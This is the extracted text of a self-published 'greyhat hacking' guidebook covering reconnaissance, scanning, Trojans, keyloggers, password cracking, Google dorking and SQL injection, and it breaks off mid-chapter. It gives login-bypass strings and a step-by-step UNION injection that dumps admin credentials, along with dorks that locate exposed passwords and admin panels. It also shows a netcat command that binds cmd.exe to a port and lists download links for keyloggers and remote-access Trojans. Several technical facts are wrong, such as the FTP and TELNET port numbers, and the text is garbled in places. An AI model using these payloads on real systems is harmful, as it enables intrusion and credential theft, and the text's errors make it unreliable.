Hackdecoders v 1.

0
Official Guide to Greyhat Hacking If you come to know the hackers mind then you cant be hacked

(B. Tech, C!EH, EC!SA, MCITP, CCNA)

Hitesh Malviya

Legal Disclaimer
Any proceedings or activities related to the material contained within this volume are exclusively your liability. The misuse and mistreat of the information the book can Consequence in unlawful charges brought against the persons in question. The authors and review analyzers will not to be held responsible in the event any unlawful charges brought against any individuals misusing the information this book to break the law. This book contains material and resources that can be potential destructive. If you dont fully comprehend something on this book, dont study this book. Please refer to the laws and acts of your state/region/province /zone/ territory or country before accessing, using or in any other way utilizing these resources. These materials and resources are for educational purpose only. Dont attempt to violate the law with anything enclosed here within. Neither writer of this book, review analyzers, the publishers nor anyone else affiliated in any way, is going to admit any responsibility for your proceedings, actions or trials.

About the Author

Hitesh Malviya is an independent Information security Researcher, Certified Ethical Hacker & Ethical Hacking trainer and has a familiarity art of knowledge in computer field. Malviya, is more Recognized for Indian No. 1 Ethical Hacking Forum Hindustan Cyber Force. He is the founder person of Hindustan Cyber Force. He has found serious vulnerabilities in Top social networking websites orkut and facebook. He is continuously working in filed of cyber security to secure most Indian domain websites. Presently, Hitesh Malviya is working with HCF Infosec Limited as Chief executive officer and with RRN Technologies as Penetration tester. Qualifications: MCP, MCTS, MCITP, CCNA, C!EH, EC!SA

Preface
Computer Hacking is the art of exploitation. It is the way enter into creators system without having his knowledge and carry out some changes in his original creation. Persons involved in these activities are usually known as hackers. Hacking doesnt mean to steal someone confidential information, cracking data, cracking system and all criminal activities. Mostly people misunderstood us as criminal. Ethical Hackers are those people who use their depth knowledge to secure companies, organization networks from crackers. They are cops behind crackers and blackhat hackers. At Present time, Cyber threats are on their top. Exploits are easily available on internet By using them any technical sound person can hack into your system or website, so awareness is must to be protect yourself from these type of cyber attacks and latest threats. After reading this book you will come to know about ethical hackers job roles and tactics and methods used by them to secure networks and systems. You will come to know about hackers mind because once you come to know this after that you cant be hacked.

If you come to know the hackers mind then you Cant be hacked
- Hitesh Malviya (Ethical Hacker)

Acknowledgements
Book or Volume of this temperament is tremendously complex to write, particularly without support of the Almighty GOD. I express heartfelt credits to My parents Mr. O. R. Solanki & Mrs. Bhawana Solanki without them I have no existence. All together, I am thankful Mr. Chandshekar Rathinam, Mr. Moin Ahmed, Arjun Tyagi, Jatin garg, Neeraj dhiman, Ashish Saini and all Hindustan cyber force crew members and all individuals who facilitated me at various stage of this volume. To finish, I am thankful to you also as you are reading this book. I am sure that it will make creative and constructive role to build your digital life more secure and aware than ever before.

Contents at a Glance
Chapter 1 Chapter 2 Chapter 3 Chapter 4 Chapter 5 Chapter 6 Chapter 7 Chapter 8 Chapter 9 Chapter 10 Chapter 11 Chapter 12 Chapter 13 Chapter 14 Chapter 15 Introduction to Ethical Hacking.8-10 Information Gathering & footprinting...11-14 Scanning & Enumeration..15-25 Trojans and Backdoors..26-36 System Hacking.37-44 Google Hacking (Basic & advanced).45-51 Sql injection and countermeasures.52-66 Cross site scripting and Countermeasures..67-72 Remote File inclusion and Countermeasures73-76 Email account cracking & security.77-85 Facebook account hacking & security.86-94 Facebook clickjacking.95-102 VPN & Proxies.103-113 Hacking Mobile Phones, PDA, Handheld Devices.114-124 Career certifications in Information Security.125-131

Chapter 1 Introduction
Objectives:
Hacker Classes Essential Terminologies Ethical Hacking Steps to perform Ethical Hacking What Ethical Hackers Do?

Hacking is the art to gain unauthorized access to computer systems and networks. Persons behind the scene are called as Hackers. Sometimes, Hacking can be defined as make some changes in systems code lead to the malicious change into the system.

Hacker Classes

Hackers can be divided in three classes:White Hat: - These are security guys, work as security consultants to secure companies network from cyber threats and attacks. They provide solution to defend against cyber threats. They also know as Ethical Hackers. Black Hat: - These are bad guys, they use their skills in destructive manner, they are highly skilled technology geeks use their skills in cracking servers and networks. Grey Hat: - Hacker who works in both offensive and defensive manner is called Grey hat. It is called most sophisticated category of hacker.

Essential Terminologies
Threat: - An action or event that might compromise security, Threat is a potential violation of security. Vulnerability: - Existence of weakness in design, or unexpected error can lead to unexpected and undesirable event is called vulnerability. Attack: - An attack is an action that violates security.

Exploit: - Exploit is the defined way to breach security, It is used to gain unauthorized access to systems.

Ethical Hacking
Ethical Hacking is the methodology to protect against Cyber threats or attacks. Person behind the scene are called Ethical Hackers. Ethical Hacker provide shield to computer networks and systems to protect against cyber threats and attacks.

Steps to perform Ethical Hacking

(1)Information Gathering: It is the first step of ethical Hacking, It can be performed in two ways active and passive. Active information gathering can be performed inside the network and passive can be performed outside the network. Various online tools and remote application tools are used for this purpose. (2)Scanning: In this phase, scanning for live hosts is performed by using port scanners. Nmap is the one of best tool used for scanning purpose by Ethical Hackers (3)Gaining Access: It is the penetration phase, Hacker exploits vulnerability to gain access to the system. (4)Maintaining Access: Hacker Change ownership of the system in this phase and install backdoor to the system for further access. (5)Clearing Tracks: Clearing tracks refers to the activity to clean all log files from the compromised system. Various Log cleaners is used for this purpose.

What Ethical hackers do?

If you know the enemy and know yourself, you need not fear the result of a hundred battles

-Sun Tzu (Art of war)

Ethical Hackers try to answer the following questions: What can Intruder (Attacker) see on the target system? (Information gathering and scanning phase) What can Intruder do with the information? (Gaining access and maintaining access phase) Does anyone at the target notice the intruders attempts or successes? (Covering Tracks phases)

Chapter 2
Objectives:

Information Gathering

Information Gathering Methods IP Address Lookup Extracting archive of website Mobile number Lookup Email spiders

Information gathering is the first step towards hacking of any system or company networks. You need to gather information about system or company network before launching an attack. Search engines Google, Yahoo, Bing can also be used in information gathering purpose. The use of Google search engine to retrieve information is known as Google hacking. Yahoo people and Google groups also proved helpful to retrieve information about any person or organization.

Information Gathering Methods

Domain Name lookup & Whois: - Finding information about particular domain name is called domain whois lookup, several websites provide this service. We just have to provide domain name, Lookup utility will retrieve all information about domain and domain administrator. Some websites which provides this utility: http://www.whois.com/ http://who.is/ http://www.networksolutions.com/whois/index.jsp

We can also use tools for this purpose Here are some tools with download link:SmartWhois Download Link: http://download.cnet.com/SmartWhois/3000-2085_4- 10059497.html ActiveWhois Download Link: http://download.cnet.com/Active-Whois/3000-2085_4-10205156.html CountryWhois Download Link: http://www.softpedia.com/progDownload/CountryWhois-Download39324.html

DNS Lookup: DNS lookup utility is used for finding information about DNS records and name servers of any particular domain. NSLOOKUP Command: nslookup is in-built command line command used for retrieving information about dns records. Few parameters are used in process of gathering dns information (1)To retrieve authoritative name server dns record >nslookup domain name >set type=a >nslookup (2) To retrieve information about Mail Exchange server Records >nslookup domain name >set type=mx >nslookup (3) To retrieve information about CNAME records >nslookup domain name >set type=cname >nslookup (4) To retrieve information about all dns records >nslookup domain name >set type=all >nslookup Here is some websites which provides online tools for dnslookup. http://www.dnswatch.info/ http://www.dnsstuff.com/

IP address Lookup:
IP address always plays important role during committing of a cyber crime. We can get information about ip address using some online tools, http://www.ipgetinfo.com/ http://ip-lookup.net/

Extracting archive of website:

You can get all information about companys website since the time it was launched at www.archive.org You can use cache option in Google search results to get the archives of the website.

Mobile Number Lookup:

You can get all information about any mobile number like (Location, service provider, GPS location etc.) by using these online tools. http://www.internet4mobile.com/mobile_number_information.aspx http://www.india-cellular.com/mobile-number-locator.aspx http://www.phonecellnumberlookup.com/ http://www.trace.bharatiyamobile.com/

Email Spiders:
Email spider is the application used for retrieve all email address inside any particular website. It used for gathering information about working email addresses of any company.

Here is some email spider tools:Power Email collector tool:

Download linkhttp://www.filebuzz.com/findsoftware/Power_Email_Collector/1.html

Chapter 3
Objectives:

Scanning & Enumeration

Port scanning Network scanning Vulnerability scanning Banner grabbing Scanning using Nmap Enumeration NetBIOS Enumeration Enumerating user accounts

Scanning is performed in preliminary steps before launching an attack. Scanning is performed to find following Information about the system, Specific IP addresses Operating systems System Architecture Services running on system Various Scanners are used for this scanning purpose. Types of Scanning (1)Port Scanning (2)Network scanning (3)Vulnerability Scanning

Port Scanning
Port Scanning is performed for intelligence gathering about open ports about the system. Each service occupied a fixed port number to run. Here are some services which run on following port Numbers: HTTP 80 FTP 23 TELNET 25 TCP 135,139,445 HTTPS 443 Port scanning is used by hacker to getting information about unknown ports on the system by using the port they can gaining access to the system.

Here is some port Scanners can be used for this purpose, you can download from given download links below and try your hands on it. SuperScan: A windows only port scanner, pinger and resolver.

Download Link: http://www.foundstone.com/us/resources/proddesc/superscan.htm AngryIPScanner: IP address and port Scanner.

Download Link: http://www.angryziber.com/ipscan/

UnicornScan: Not your mothers port scanner. http://www.unicornscan.org/ Scanrand: An unusually fast stateless network service and topology discover system. http://www.doxpara.com/

Network Scanning
Networking scanning is the way of intelligence gathering about alive and dead hosts in the network. Various Network scanners are used for this purpose. We can also use ping command for finding active hosts on the network. Here are some Network scanners with download links, you can use these for network scanning.

SoftPerfect Network Scanner

It is a free multi-threaded IP, NetBIOS and SNMP scanner with a modern interface and many advanced features. It is intended for both system administrators and general users interested in computer security. The program pings computers, scans for listening TCP/UDP ports and displays which types of resources are shared on the network (including system and hidden).

Download Link: http://www.softperfect.com/download/freeware/netscan.exe

Solarwinds Engineers toolset

It includes 49 powerful network management, monitoring and Troubleshooting tools to easily and effectively manage your network.

Download Link: http://download.cnet.com/SolarWinds-Engineer-s-Toolset/30002651_4-10764878.html

Vulnerability

Scanning

It is the automated process to identify vulnerabilities in computer systems present in a network. Some vulnerability Scanners can be used for this purpose.Here is some Vulnerability scanner with download links below:

SAINT
SAINT is another commercial vulnerability assessment tool (like Nessus, ISS Internet Scanner, or Retina). It runs on UNIX and used to be free and open source, but is now a commercial product.

Download Link: http://www.lynjonic.com/free_trial.htm

Nessus Vulnerability Scanner

Nessus is a vulnerability scanner which looks for bugs in software. An attacker can use this tool to violate the security Aspects of a software product.

Features:
Plug-in architecture NASL(Nessus attack scripting Language) Can test unlimited number of hosts simultaneously Smart service recognition Smart Plug-ins Up-to-date security vulnerability database

Download Link:- www.tenable.com/products/nessus

Retina Vulnerability Scanner

It can scan every machine on the target network, including a variety of operating system platforms, Networking devices, databases and third party or custom applications. It has most up-to-date vulnerability database and scanning methodology.

Download Link:223041.html

http://www.brothersoft.com/retina-network-security-scanner-

Banner Grabbing:
Banner grabbing is the technique used for grab the banner of website. You can get header of website using this technique. Telnet Command line in-built tool is used for this purpose. Command: telnet domain name 80 HEAD /HTTP /1.0

Scanning using Nmap

Nmap is the open source utility used for network exploration, it is designed to rapidly scan large networks. Nmap is used for carry out port scanning, OS Detection, Version detection, ping sweep and many other techniques.

Nmap Scanning options:

-sT(TCP connect scan) -sS(SYN scan) -sF(FIN Scan) -sX(XMAS Scan) -sN(Null Scan) -sP(Ping Scan) -sU(UDP Scan) -sI(Idle Scan) -sW(Window scan) -sR(RPC Scan) -sL(List/dns Scan) -PO(dont ping) -PT(TCP Ping) -PS(SYN Ping) -PI(ICMP Ping) -PM(ICMPNetmask)

Download Link: www.nmap.org/download.htm

Enumeration
Enumeration is defined as extraction of usernames, shares, machine names, resources and services, Enumeration service is conducted in intranet (LAN) environment.

NetBios Enumeration
NetBios is the BIOS information of any domain over network once you extract NetBios information, you can get shares, services and all other information about domain. NetBios Enumeration can be performed by using following windows built in command line tools:

Using Net View

Net View lists all hosts present in the domain and lists all shares of individual host in the domain. Commands: Net view /domain Net view \\<some computer>

Using nbtstat
nbtstat is the inbuilt windows command line tool used to display information about a computers NetBIOS connection and name tables. Run: nbtstat A <some ip address> Display protocol status and current TCP/IP connections Using NBT(NetBios over TCP/IP) nbtstat [-a remotename] [-A IP address] [-c] [-n] [-r] [-R] [-s] [-S] [interval] ]

NetBIOS Nullsessions
The nullsession is often referred to as the holy grail of windows hacking. Null sessions take advantage of flaws in SMB (server messaging Block) You can establish a connection with windows host by logging on with null username and password. Dumpsec is a tool used to reveal shares over a null session with the target computer.

Download Link: - http://www.systemtools.com/cgi-bin/download.pl?DumpAcl

Inter process communication (IPC)

Using IPC anyone can shares or resources of any host in domain over network by creating a null session. Command: c:\net use \\ <ip address>\IPC$ /u:

Null sessions Countermeasures

Null sessions require access to TCP port 139 and 445. It doesnt work in windows server 2003. You could disable SMB service to prevent from null session. The another way is to restrict anonymous user by edit the registry settings. Step 1. Open regedit32 and navigate to HKLM\SYSTEM\CurrentControlSet\LSA Step 2. Choose edit | add value Value name : Restrict Anonymous Data_type: REG_WORD Value: 2

Enumerating User accounts

Two powerful tools are used for this purpose: User2sid Sid2user They can be downloaded at www.chem.msu.su/^rudnyi/NT/

Tool: Getacct, it is also used for retrieve information about user accounts on windows server 2000/NT machines. It sidesteps Restrict anonymous=1.

Download link: www.securityfriday.com

Chapter 4 Trojans or Backdoors

Objectives:
Trojans

Types of Trojans Different ways a Trojan can get into your system Indication of Trojan attacks Port numbers use by some known Trojans Some classic Trojans Trojan detecting tools Anti Trojan softwares Backdoor programs countermeasures

Trojans
Trojans are small piece of program code used to infect any computer system. It hides it presence in the infected system. Attacker sends Trojan to the victim machine when he goes online. Trojan occupied any port number on machine to run. An Attacker smartly changes the Trojan name with any predefined service on the machine, after that user cant recognize if the Trojan exists on the machine.

Types of Trojans
Remote access Trojan Data sending Trojan Destructive Trojan DOS attack Trojan Proxy Trojan FTP Trojan

Different ways a Trojan can get into your system

Instant messenger application Internet relay chat Attachments Physical access NetBIOS(File sharing) Fake programs Untrusted sites and freeware softwares

Indications of Trojan attacks

CD-Rom drawer opens and closes by itself Wallpaper, screensaver and theme settings changed by themselves. Computer browser goes to a strange and unknown page by itself. Computer shut down and restarts by itself. Taskbar disappears and many other unusual tasks happened by itself without user interaction

Port Number use by some known Trojans

Backorifice Deepthroat NetBus Whake-a-mole UDP UDP TCP TCP 31337 or 31338 2140 or 3150 12345 or 12346 12361 or 12362

Some Classic Trojans

Tini:
Tini is small Trojan program which is only 3 kb in size and written in assembly language. Tini only listen to port 7777 and runs a command prompt when someone attaches to this port. An attacker cans telnet to tini server at port 7777 from tini client.

Download Link: http://ntsecurity.nu/toolbox/tini

NetBus
NetBus is a Win-32k based Trojan program. Like Backorifice it allows a remote user to access and control the victim machine by the way its internet link. This virus is known as Backdoor.Netbus

Download link: http://www.filestube.com/4c22b3aa2987df5503e9,g/netbus.html

Netcat
Netcat is called swiss-army knife of networking tools. It provides a basic TCP/UDP networking subsystem allow users to interact manually or via script with network applications. It has built-in source routing capabilities.

Netcat client/Server commands:

Client end: c:>nc <ip> <port> Server end: c:>nc L p <port> -t e cmd.exe

Download Link: http://netcat.sourceforge.net/

Beast
Beast is a powerful Remote administration tool (RAT) built with Delphi 7. It provides server and client. An attacker manages to install beast on the remote machine. It will provide server to attacker machine. An attacker can remotely administrator the victim machine, he can send remote commands through server. It is the most powerful tool, attacker can use many resources of victim machine.

Download link: http://www.filestube.com/60e733eececb808203e9,g/Beast-v2-07.html

Trojan detecting Tools:

You can detect Trojan on the remote machine using following tools:

TCP View

Download Link: http://download.cnet.com/TCPView/3000-2094_4-10796077.html

Msconfig utility

Windows in-built command,access through run window.

Hijack this

Download Link: http://download.cnet.com/Trend-Micro-HijackThis/3000-8022_4-10227353.html Super system Helper tool

Download Link: http://www.filestube.com/7M84mA9A5TaJQhTJxTcXQR/Super-System-Helper-ToolEXE.html

Anti Trojan Softwares:

TrojanHunter

Download Link: http://download.cnet.com/TrojanHunter/3000-8022_4-10703997.html Spyware Doctor

Download Link: http://download.cnet.com/Spyware-Doctor/3000-8022_4-10377263.html Comodo BOclean

Download Link: http://comodo-boclean.en.softonic.com/download

Backdoor programs countermeasures

Most commercial available tools detect backdoor programs before they can cause damage. Educate people not to install Applications downloaded from the internet and email attachments. File integration method can be used for detect backdoor programs on the remote machine.

Tripwire
Tripwire is the system integrity Verifier(SIV). It will periodically scan all those files and any modification has been occurred in information then an alarm is raised.

Download Link: http://sourceforge.net/projects/tripwire/

MD5sum
MD5sum.exe is the checksum utility. It takes MD5 digital snapshot of system files. You can check suspected files MD5 with the snapshot checksum. Command: md5sum *.* > md5sum.txt

Download Link: http://www.pc-tools.net/win32/md5sums/

Chapter 5
Objectives:

System Hacking

Password Cracking Password crackers Keylogger Spyware Keylogger countermeasures

An attacker can access the system by gaining access to the user accounts of remote machine. He needs to crack the password of user accounts for gaining access to the remote system.

Password Cracking
It is the way to crack the passwords of system. Encrypted passwords are saved in system database. An attacker use hacking tools to crack these encrypted passwords and after using the clear text password he can access to the system. Three Methods are used to crack passwords (Offline attack):

Dictionary word attack

In this method, password can be found using dictionary words saved in dictionary file. Password cracker tries to crack using different passwords from a list. It can be succeed only with poor passwords. It takes very less time.

Brute-force Attack
It tries all possible combination of words to find a password. It is a time consuming method. Time limit to crack password is depended on word length of the password. Sometimes it takes 2-3 days to crack a password. It can be used with string passwords.

Hybrid attack
It is the combination of Dictionary word and brute-force attacks. This technique may be used when the password is non-existing word and the attacker tries some technique to crack it.

Password Crackers
Abcom PDF Password cracker is the program that break the security of PDF documents.

Download Link: http://abcom-pdf-password-cracker- pro.findmysoft.com/download/ L0phtcrack It is the SMB packet capture tool used to crack LC4 segment passwords.

Download Link: http://www.net-security.org/software.php?id=756 RainbowCrack It is the tool used to crack all possible hashes stored in rainbow table.

Download Link: http://www.net-security.org/software.php?id=515 JohntheRipper It is a command line tool designed to crack both UNIX and NT passwords.

Download Link: http://www.openwall.com/john/

0phcrack it is a windows password cracker based on the faster time memory trade-off. It uses the rainbow tables. It can crack 99% passwords of (passwords of length 6 or less composed by the characters, alphanumeric passwords of length 7 (Both case) and length 8 (lowercase only). Download Link: http://ophcrack.sourceforge.net/

Keylogger
Keylogger is the remote administration tool used by hackers to record activities on a remote machine. It records keystrokes entered by a user on remote machine, and save a log file on the system. It always works in hidden mode. We can grab all kind of user accounts by using this tool. We only manage to install keylogger on the remote machine. Once you have managed to install the keylogger on the remote machine, it will periodically send you log files to your server. There are two types of keyloggers: Hardware keylogger Software keylogger

Ardamax Keylogger
Ardamax keylogger is a keystroke recorder that captures users activity and saves it in an encrypted log file. Logs can be automatically sent to your email address, access to keylogger is password protected. It runs in invisible mode.

Download Link: http://www.box.net/shared/lidooniyjv

Actual Spy Keylogger

It is designed for hidden computer monitoring. It is capable of capture all strokes, screen, clipboards, website activities and print activities.

Download Link: http://www.4shared.com/file/J28nUoDK/Actual_Spy_3_Crack.html

Spyware
Spyware is a program that records computer activities on a machine. Records Keystrokes Records email messages Records IM Chat sessions Records website visited Records applications opened Captures screenshots

Acespy
It separately record everything that is done on the computer and also can block websites or programs

Download Link: 10206540.html

http://download.cnet.com/AceSpy-Spy-Software/3000-2162_4-

eBlaster

It shows what the surveillance target surfs on internet and records all emails,chats,instant messages, websites visited and keystrokes typed and automatically sends this recorded information to the desired email address.

Download Link: http://www.eblaster-download.com/

PCPhoneHome
PCPhoneHome tool tracks stolen laptops, when the stolen laptop is online, it will send a stealth message to the predetermined email address containing its exact location. Install the software and restart the computer Start->run->configmod Enter your email address Thats all Whenever your system is online, you will receive notification through email.

Download Link: www.pcphonehome.com

Keylogger countermeasures
Install antivirus and keep the signatures up-to-date. Use privacy keyboard while entering important user account name or passwords.

You can download privacy keyboard from http://anti-keylogger.com Install Host based IDS system on your system. Install anti-keylogger software on your system.

You can get it from http://www.anti-keyloggers.com/download.html

Chapter 6
Objectives:

Google Hacking (Basic & Advanced)

Error messages Files containing juicy information Advisories & vulnerabilities Files containing usernames Files containing passwords Pages containing login portals Various online devices Vulnerable servers

Google Hacking is the art of grabbing information by using Google search engine. Few operators are used for this purpose. Mostly Google hacking is used for finding vulnerable files and servers. You can also use Google hacking to filter search results. String Keywords used for this purpose are called Google dorks. You can get Google hacking database from http://www.hackersforcharity.org/ghdb/ and can try dorks given in the database. Here is some Example of Google Hacking given below:

Error messages
"Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forum This dork reveals logins to databases that were denied for some reason. "Parse error: parse error, unexpected T_VARIABLE" "on line" filetype: php PHP error with a full web root path disclosure "Warning: mysql_query()" "invalid query" MySQL query errors revealing database schema and usernames. filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error" This search will show an attacker some PHP error logs which may contain information on which an attack can be based. IIS web server error messages intitle:"the page cannot be found" "internet information services This query finds various types of IIS servers. This error message is fairly indicative of a somewhat unmodified IIS server, meaning it may be easier to break into.

Files containing juicy info

"phpMyAdmin" "running on" inurl:"main.php" From phpmyadmin.net : "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW." Great, easy to use, but lock it down! Things you can do include viewing MySQL runtime information and system variables, show processes, reloading MySQL, changing privileges, and modifying or exporting databases. Hacker-fodder for sure!

"robots.txt" "Disallow:" filetype:txt The robots.txt file serves as a set of instructions for web crawlers. The "disallow" tag tells a web crawler where NOT to look, for whatever reason. Hackers will always go to those places first! allinurl:cdkey.txt cdkeys exported email addresses e-mail address filetype:csv csv Loads of user information including email addresses exported in comma separated file format (.cvs). This information may not lead directly to an attack, but most certainly counts as a serious privacy violation. filetype:conf inurl:firewall -intitle:cvs These are firewall configuration files. Although these are often examples or sample files, in many cases they can still be used for information gathering purposes. filetype:reg "Terminal Server Client" These are Microsoft Terminal Services connection settings registry files. They may sometimes contain encrypted passwords and IP addresses. Financial spreadsheets: finance.xls intitle:"Index of" finance.xls "Hey! I have a great idea! Let's put our finances on our website in a secret directory so we can get to it whenever we need to!"

Advisories & vulnerabilities

"Active Webcam Page" inurl:8080 Active WebCam is a shareware program for capturing and sharing the video streams from a lot of video devices. Known bugs: directory traversal and cross site scripting "Online Store - Powered by ProductCart" ProductCart is "an ASP shopping cart that combines sophisticated ecommerce features with time-saving store management tools and remarkable ease of use. It is widely used by many e-commerce sites". Multiple SQL injection vulnerabilities have been found in the product, they allow anything from gaining administrative privileges (bypassing the authentication mechanism), to executing arbitrary code. "Powered by A-CART" A-CART is an ASP shopping cart application written in VBScript. It is comprised of a number of ASP scripts and an Access database. Security vulnerability in the product allows remote attackers to download the product's database, thus gain access to sensitive information about users of the product (name, surname, address, e-mail, credit card number, and user's login-password). "Powered by GTChat 0.95"+"User Login"+"Remember my login information" There is a (adduser) remote denial of service vulnerabilty on version 0.95

Files containing usernames

filetype:reg reg +intext:"internet account manager" This google search reveals users names, pop3 passwords, email addresses, servers connected to and more. The IP addresses of the users can also be revealed in some cases. inurl:admin filetype:asp inurl:userlist This search reveals userlists of administrative importance. Userlists found using this method can range from benign "message group" lists to system userlists containing passwords. inurl:admin inurl:userlist This search reveals userlists of administrative importance. Userlists found using this method can range from benign "message group" lists to system userlists containing passwords. site:extremetracking.com inurl:"login=" The search reveals usernames (right in the URL in green) and links to the sites that are signed up with extremetracking.com. From here an attacker can view any of the sites stats, including all the visitors to the site that is being tracked, including their IP adresses.

Files containing passwords

ext:php intext:"$dbms""$dbhost""$dbuser""$dbpasswd""$table_prefix""phpbb_installed " Hacking a phpBB forum. Here you can gather the mySQL connection information for their forum database. View the .php info by using Google's cache feature.

filetype:ini wcx_ftp These searches for Total commander FTP passwords (encrypted) in a file called wcx_ftp.ini. Only 6 hit at the moment, but there may be more in the future. filetype:log inurl:"password.log" These files contain cleartext usernames and passwords, as well as the sites associated with those credentials. Attackers can use this information to log on to that site as that user. filetype:sql "insert into" (pass|passwd|password) Looks for SQL dumps containing cleartext or encrypted passwords.

Pages containing Login portals

"site info for" "Enter Admin Password" This will take you to the cash crusader admin login screen. It is my first google hack.. also try adding index.php at the end, have fun people :) intext:&quot;vbulletin&quot; inurl:admincp vBulletin Admin Control Panel inurl:login.asp This is a typical login page. It has recently become a target for SQL injection. inurl::2082/frontend -demo This allows you access to CPanel login dialogues/screens.

Various online devices

intitle:"ipcop - main" IPCop Firewall is a Linux firewall for home and SOHO users. IPCop can be managed from a simple web interface (which can be found and managed by Google Hackers ;)

intitle:"IVC Control Panel" intitle:"IVC Control Panel" intitle:"Live NetSnap Cam-Server feed" Netsnap Online Cameras intitle:"V1" "welcome to phone settings" password This is a small search for the Italk BB899 Phone Adaptor login page. iTalkBB is a local and long distance calling service provided by iTalk Broadband Corporation. It combines voice and internet networks to provide inbound and outbound long distance and local calling solutions.

Vulnerable servers
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*" Search for phpMyAdmin installations that are configured to run the MySQL database with root privileges. "html allowed" guestbook When this is typed in google it finds websites which have HTML Enabled guestbooks. "Welcome to PHP-Nuke" congratulations This finds default installations of the postnuke CMS system. In many cases, default installations can be insecure especially considering that the administrator hasn't gotten past the first few installation steps. "Welcome to Administration" "General" "Local Authentication" inurl:admin This reveals admin site for Argo Software Design Mail Server. Domains" "SMTP

You can download automated google hacking tool for making your effort very easily and sufficiently. Googlag Scanner is the automated tool used for google hacking.

Download http://downloadsquad.switched.com/tag/goolag%20scanner/

Link:

Chapter 7 SQL Injection & Countermeasures

Objectives:
Some string used to perform SQL Injection Some Google dorks to find vulnerable login portals How to hack website using sql vulnerable strings Error based SQL Injection Blind SQL Injection Google dorks to find sql injection vulnerable websites Automated tools SQL Injection countermeasures

SQL Injection is the method used for bypassing user authentication of any webform(Login portals).An attacker gives a malicious string input to the webform which takes the user to the admin area of websites. An attacker can add, delete files and play with website contents after gaining access to the admin area.

Some Strings used to perform SQL injection

' or 1=1-' or = ' or 'a'='a hi' or 1=1 -' or 1=--

Some Google Dorks to find vulnerable login portals

/admin/adminlogon.asp /admin/admin_login.asp /admin/admin_logon.asp /administrator/admin.asp /administrator/login.asp

How to hack website using SQL Vulnerable strings

Find any vulnerable login portal using Mentioned google dorks. Give any sql string as input to both username and password field. You can check all strings until get succeed to gain access into admin area.

Error Based SQL Injection

1). Check for vulnerability
lets say that we have some site like this http://www.site.com/news.php?id=1 Now to test if is vulnerable we add to the end of URL ' (quote), and that would be http://www.site.com/news.php?id=1' If it is vulnerable you should get an SQL error such as

"Sorry: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 or something like that.

2). Find the number of columns

To find number of columns we use statement ORDER BY. This function tells the SQL database how to order the result. We use this to find how many tables are there. You need to type order by 1/*(or 1--) and keep adding one until you get an error.

Example:
http://www.site.com/news.php?id=1 order by 1/* <-- no error http://www.site.com/news.php?id=1 order by 2/* <-- no error http://www.site.com/news.php?id=1 order by 3/* <-- no error http://www.site.com/news.php?id=1 order by 4/* <-- An error This means there are only 3 tables because we got an error after order by 3

3). Check for UNION function

The UNION function shows data from the selected tables or columns etc. Example: http://www.site.com/news.php?id=1 union all select 1,2,3/* or 3-- (We know there are 3 tables). If you see numbers on the page then the UNION function is working. Try in place of /* if the query doesnt give any result.

4). Check for MySQL version

If you get, say number one, then this is where we insert the @@version or version(). (@@version or version() represent the version of the database) Example: http://www.site.com/news.php?id=1 union all select @@version,2,3/* You may get "Illegal mix of collations (IMPLICIT+ COERCIBLE) kind of errors. If you get any error while using above query then you must need to convert the statement using the convert() function. Example: http://www.site.com/news.php?id=1 union all select unhex(hex(@@version)),2,3/*

5). Getting table and column name If the MySQL version is < 5 (i.e 4.1.33, 4.1.12...).
We need to guess table names in most of cases. You can guess some table names from listed below: user,admin,member,username,user,usr,user_name, password,pass,passwd,pwd etc. Example: http://www.site.com/news.php?id=1 union all select 1,2,3 from admin/* If we see any number,it can be 1 or 2 or 3, and then it concludes that table name admin exists in database. Now check Column names. Example(find username): http://www.site.com/news.php?id=1 union all select 1,username,3 from admin/* If you get an error the column doesn't exist. If it works you will get a username displayed on the page, example would be admin, or superadmin etc. Example(finding password): http://www.site.com/news.php?id=1 union all select 1,password,3 from admin/* If you get an error the column doesn't exist. If it worked, you will see a password on the page in hash format or in plain-text format. Join all strings using the concat() function. The concat() function joins all strings related to your query.

Example: http://www.site.com/news.php?id=1 union all select 1,concat(username,0x3a,password),3 from admin/* (0x3a is Hex for a .You could also use an ASCII value for the colon. Using ASCII Table. If it worked you will see all usernames and passwords in order like so: username:password Some admin change the column name but you can use mysql.user instead. Example: http://www.site.com/news.php?id=1 union all select 1,concat(user,0x3a,password),3 from mysql.user/* If the MySQL version is =>5

Find Table name

